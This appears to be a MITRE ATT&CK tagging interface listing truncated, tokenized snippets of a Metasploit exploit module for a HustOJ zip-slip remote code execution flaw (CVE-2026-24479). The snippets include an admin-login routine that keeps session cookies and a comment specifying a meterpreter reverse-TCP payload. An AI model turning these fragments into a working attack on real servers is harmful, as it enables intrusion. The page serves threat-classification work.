T1190Exploit Public-Facing Application
“arch ' = > [ arch _ x86 ], ' references ' = > [ [ ' url ', ' https : / / github. com / oxagast / oxasploits / blob / joshuajohnward / exploits ' \ ' / cve - 2026 - 24479 / hustoj _ problem _ import _ rce. rb ' ], [ ' url ', ' https : / / github. com / zhblue / hustoj / commit / 9…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1190Exploit Public-Facing Application
“. new ( ' handler ', [ true, ' start an exploit / multi / handler job to receive the connection ', true ] ) ] ) deregister _ options ( ' vhost ', ' proxies ', ' rhosts ', ' ssl ' ) end # check if the target is likely vulnerable def check res = send _ request _ cgi ( ' uri ' = > '…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1190Exploit Public-Facing Application
“configured for : # msfvenom - p linux / x86 / meterpreter _ reverse _ tcp - - format elf # # patch : # $ file _ name = $ path. zip _ entry _ name ( $ dir _ resource ) ; # $ file _ name = str _ replace ( '.. / ', ' ', $ file _ name ) ; # $ file _ path = substr ( $ file _ name, 0, …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1190Exploit Public-Facing Application
“problem import rce ( cve - 2026 - 24479 ) class metasploit3 < msf : : exploit : : remote rank = excellentranking include msf : : exploit : : remote : : httpclient prepend msf : : exploit : : remote : : autocheck def initialize ( info = { } ) super ( update _ info ( info, ' name '…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1539Steal Web Session Cookie
“' ) exploit : : checkcode : : safe end # authenticate as admin and return session cookies def login ( user, pass ) res = send _ request _ cgi ( { ' uri ' = > ' / ', ' method ' = > ' get ', ' keep _ cookies ' = > true, ' ctype ' = > ' text / html ' }, 3 ) if res & & res. code = = …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1190Exploit Public-Facing Application
“[ webapps ] hustoj zip - slip v26. 01. 24 - rce hustoj zip - slip v26. 01. 24 - rce # exploit title : hustoj zip - slip v26. 01. 24 - rce # date : 2026 - 02 - 14 # exploit author : marshall whittaker / oxagast # vendor homepage : https : / / github. com / zhblue / hustoj # softwa…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…
T1190Exploit Public-Facing Application
“' ) exploit : : checkcode : : safe end # authenticate as admin and return session cookies def login ( user, pass ) res = send _ request _ cgi ( { ' uri ' = > ' / ', ' method ' = > ' get ', ' keep _ cookies ' = > true, ' ctype ' = > ' text / html ' }, 3 ) if res & & res. code = = …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for
Loading techniques…